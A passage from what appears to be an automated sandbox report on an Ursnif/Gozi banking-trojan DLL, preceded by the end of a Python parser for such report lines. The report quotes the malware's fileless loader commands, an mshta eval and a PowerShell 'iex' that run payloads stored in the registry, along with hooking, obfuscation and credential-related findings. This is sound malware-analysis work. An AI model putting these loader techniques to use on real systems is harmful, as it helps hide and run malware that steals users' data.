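    r"Source: C:\Windows\explorer.exe Code function: 32_2_04DE1148 NtCreateSection, 32_2_04DE1148",
    r"Source: C:\Windows\System32\loaddll32.exe Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff 0_2_01385ECA",
    r"Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100021A4 0_2_100021A4",
    r"Source: C:\Windows\System32\rundll32.exe Code function: 36_2_0000020675791003 NtProtectVirtualMemory,NtProtectVirtualMemory, 36_2_0000020675791003",
]

if __name__ == "__main__":
    for image, steps in steps_per_image(SAMPLE_LINES).items():
        print(f"{image}: {sorted(steps)}")
    print("full chain:", sorted(injection_chain_images(SAMPLE_LINES)))
```

On the quoted lines the parser recovers the cookie.ff path as the string argument of 0_2_01385ECA, skips the bare-address crypto entry, and reports the full chain for loaddll32.exe and explorer.exe while rundll32.exe, which only shows NtProtectVirtualMemory here, is not flagged. The same parser can be run over the complete report to confirm that control.exe also covers all three steps.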
Contains functionality to launch a process as a different user
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A1CB8 CreateProcessAsUserA, 0_2_013A1CB8
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_100021A4 0_2_100021A4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F840B3 0_2_00F840B3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8AF44 0_2_00F8AF44
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A7188 0_2_013A7188
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139D057 0_2_0139D057
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013948AD 0_2_013948AD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138D0DC 0_2_0138D0DC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0138E384 0_2_0138E384
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01398BF3 0_2_01398BF3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013862FA 0_2_013862FA
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139ED4B 0_2_0139ED4B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01384C03 0_2_01384C03
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0139D7BD 0_2_0139D7BD
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A3EAF 0_2_013A3EAF
Source: C:\Windows\explorer.exe Code function: 32_2_04DEECE0 32_2_04DEECE0
Source: C:\Windows\explorer.exe Code function: 32_2_04E05428 32_2_04E05428
Source: C:\Windows\explorer.exe Code function: 32_2_04DEDF58 32_2_04DEDF58
Source: C:\Windows\explorer.exe Code function: 32_2_04E0A074 32_2_04E0A074
Source: C:\Windows\explorer.exe Code function: 32_2_04DFB814 32_2_04DFB814
Source: C:\Windows\explorer.exe Code function: 32_2_04DE69DC 32_2_04DE69DC
Source: C:\Windows\explorer.exe Code function: 32_2_04DEB9E8 32_2_04DEB9E8
Source: C:\Windows\explorer.exe Code function: 32_2_04DFD92C 32_2_04DFD92C
Source: C:\Windows\explorer.exe Code function: 32_2_04DEDA3C 32_2_04DEDA3C
Source: C:\Windows\explorer.exe Code function: 32_2_04DFAA28 32_2_04DFAA28
Source: C:\Windows\explorer.exe Code function: 32_2_04E093FC 32_2_04E093FC
Source: C:\Windows\explorer.exe Code function: 32_2_04E04B78 32_2_04E04B78
Source: C:\Windows\explorer.exe Code function: 32_2_04DEFCA0 32_2_04DEFCA0
Source: C:\Windows\explorer.exe Code function: 32_2_04DF1C0C 32_2_04DF1C0C
Source: C:\Windows\explorer.exe Code function: 32_2_04DE65D8 32_2_04DE65D8
Source: C:\Windows\explorer.exe Code function: 32_2_04DF75D8 32_2_04DF75D8
Source: C:\Windows\explorer.exe Code function: 32_2_04DF8DD0 32_2_04DF8DD0
Source: C:\Windows\explorer.exe Code function: 32_2_04DE5DA8 32_2_04DE5DA8
Source: C:\Windows\explorer.exe Code function: 32_2_04DF25A4 32_2_04DF25A4
Source: C:\Windows\explorer.exe Code function: 32_2_04E0C560 32_2_04E0C560
Source: C:\Windows\explorer.exe Code function: 32_2_04E07D44 32_2_04E07D44
Source: C:\Windows\explorer.exe Code function: 32_2_04DF6528 32_2_04DF6528
Source: C:\Windows\explorer.exe Code function: 32_2_04DE96D8 32_2_04DE96D8
Source: C:\Windows\explorer.exe Code function: 32_2_04DFCE90 32_2_04DFCE90
Source: C:\Windows\explorer.exe Code function: 32_2_04DE1600 32_2_04DE1600
Source: C:\Windows\explorer.exe Code function: 32_2_04E10614 32_2_04E10614
Source: C:\Windows\explorer.exe Code function: 32_2_04DFA0F0 32_2_04DFA0F0
Source: C:\Windows\explorer.exe Code function: 32_2_04DF9850 32_2_04DF9850
Source: C:\Windows\explorer.exe Code function: 32_2_04DF782C 32_2_04DF782C
Source: C:\Windows\explorer.exe Code function: 32_2_04DE49C4 32_2_04DE49C4
Source: C:\Windows\explorer.exe Code function: 32_2_04E019FC 32_2_04E019FC
Source: C:\Windows\explorer.exe Code function: 32_2_04E0A9FC 32_2_04E0A9FC
Source: C:\Windows\explorer.exe Code function: 32_2_04DF99F8 32_2_04DF99F8
Source: C:\Windows\explorer.exe Code function: 32_2_04DE596C 32_2_04DE596C
Source: C:\Windows\explorer.exe Code function: 32_2_04DEE2B0 32_2_04DEE2B0
Source: C:\Windows\explorer.exe Code function: 32_2_04E1027C 32_2_04E1027C
Source: C:\Windows\explorer.exe Code function: 32_2_04E0EA40 32_2_04E0EA40
Source: C:\Windows\explorer.exe Code function: 32_2_04E06250 32_2_04E06250
Source: C:\Windows\explorer.exe Code function: 32_2_04E0E220 32_2_04E0E220
Source: C:\Windows\explorer.exe Code function: 32_2_04DF7218 32_2_04DF7218
Source: C:\Windows\explorer.exe Code function: 32_2_04DE2A34 32_2_04DE2A34
Source: C:\Windows\explorer.exe Code function: 32_2_04DE9A34 32_2_04DE9A34
Source: C:\Windows\explorer.exe Code function: 32_2_04E003EC 32_2_04E003EC
Source: C:\Windows\explorer.exe Code function: 32_2_04E0A3B2 32_2_04E0A3B2
Source: C:\Windows\explorer.exe Code function: 32_2_04DE7B44 32_2_04DE7B44
Source: C:\Windows\explorer.exe Code function: 32_2_04DFB378 32_2_04DFB378
Source: C:\Windows\explorer.exe Code function: 32_2_04DF6B00 32_2_04DF6B00
Source: C:\Windows\explorer.exe Code function: 32_2_04E2138C 32_2_04E2138C
Source: C:\Windows\System32\control.exe Code function: 33_2_00AD69DC 33_2_00AD69DC
Source: C:\Windows\System32\control.exe Code function: 33_2_00AF4B78 33_2_00AF4B78
Source: C:\Windows\System32\control.exe Code function: 33_2_00AF5428 33_2_00AF5428
Source: C:\Windows\System32\control.exe Code function: 33_2_00AEA0F0 33_2_00AEA0F0
Source: C:\Windows\System32\control.exe Code function: 33_2_00AE782C 33_2_00AE782C
PE / OLE file has an invalid certificate
Source: out.dll Static PE information: invalid certificate
PE file does not import any functions
Source: f1lrerxf.dll.26.dr Static PE information: No import functions for PE file found
Source: ntdrbunx.dll.29.dr Static PE information: No import functions for PE file found
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Uses 32bit PE files
Source: out.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Yara signature match
Source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: classification engine Classification label: mal100.bank.troj.spyw.evad.winDLL@28/33@7/2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8229C CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification, 0_2_00F8229C
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{857C95B3-5D28-11EB-90E5-ECF4BB2D2496}.dat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{A6C5620A-CD20-C84B-873A-517CAB0E1570}
Source: C:\Windows\System32\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{8E231364-9555-F0A9-8FA2-992433F6DD98}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_01
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{EA8F1CAB-417E-AC42-1BBE-05A07FD209D4}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{DE7DF658-A5CB-C008-1FF2-A9F4C346ED68}
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF75DD507BDBD79E0A.TMP
Source: out.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: out.dll Virustotal: Detection: 36%
Source: out.dll ReversingLabs: Detection: 45%
Source: loaddll32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\out.dll'
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17420 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:82962 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9BB5.tmp' 'c:\Users\user\AppData\Local\Temp\f1lrerxf\CSC9A4B28F2F0C74BBFAD6D775E23C8FA61.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESAC30.tmp' 'c:\Users\user\AppData\Local\Temp\ntdrbunx\CSC5967AF4362DF4FAC8293E16849360B0.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76B1.bi1'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:17420 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6564 CREDAT:82962 /prefetch:2
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9BB5.tmp' 'c:\Users\user\AppData\Local\Temp\f1lrerxf\CSC9A4B28F2F0C74BBFAD6D775E23C8FA61.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESAC30.tmp' 'c:\Users\user\AppData\Local\Temp\ntdrbunx\CSC5967AF4362DF4FAC8293E16849360B0.TMP'
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76B1.bi1'
Source: C:\Windows\explorer.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\explorer.exe File opened: C:\Windows\SYSTEM32\msftedit.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: out.dll Static PE information: More than 200 imports for KERNEL32.dll
Source: out.dll Static PE information: More than 200 imports for USER32.dll
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.525112099.00000198C4F60000.00000002.00000001.sdmp, csc.exe, 0000001D.00000002.534673965.000001F4112D0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000000.562075571.0000000007AA0000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.552332584.0000000004960000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.552332584.0000000004960000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000021.00000002.570924017.000001F85E9BC000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000021.00000002.570924017.000001F85E9BC000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000020.00000000.562075571.0000000007AA0000.00000002.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01385BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_01385BD5
PE file contains sections with non-standard names
Source: out.dll Static PE information: section name: .data2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002193 push ecx; ret 0_2_100021A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_10002140 push ecx; ret 0_2_10002149
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8E6BE push esp; retf 0_2_00F8E6BF
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8AC00 push ecx; ret 0_2_00F8AC09
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8E1AF push ebx; ret 0_2_00F8E1B2
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8E163 push edx; iretd 0_2_00F8E164
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F8AF33 push ecx; ret 0_2_00F8AF43
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FBBAD0 push edx; ret 0_2_00FBBBD4
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB3C54 push eax; iretd 0_2_00FB3C4B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB3C32 push eax; iretd 0_2_00FB3C4B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB197F push ds; retf 0_2_00FB198D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB5EB0 push 0E0634C7h; retf 0_2_00FB5EB5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB16B6 push ecx; ret 0_2_00FB16B7
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB52B6 push esp; iretd 0_2_00FB52D5
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB3205 push cs; retf 0_2_00FB3206
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB3FFB pushad ; iretd 0_2_00FB400E
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00FB33A6 push ds; ret 0_2_00FB33BB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A7177 push ecx; ret 0_2_013A7187
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A6E10 push ecx; ret 0_2_013A6E19
Source: C:\Windows\explorer.exe Code function: 32_2_04E0C131 push 3B000001h; retf 32_2_04E0C136
Source: C:\Windows\System32\control.exe Code function: 33_2_00AFC131 push 3B000001h; retf 33_2_00AFC136
Source: C:\Windows\System32\rundll32.exe Code function: 36_2_000002067577C131 push 3B000001h; retf 36_2_000002067577C136

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\f1lrerxf\f1lrerxf.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\ntdrbunx\ntdrbunx.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471442010.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.488558578.00000000039BB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000003.564443999.0000000002810000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471408870.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471558196.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471537279.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471488568.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471572594.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471379403.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.471511169.0000000003B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7156, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6328, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6440, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5536, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200
Modifies the prolog of user mode functions (user mode inline hooks)
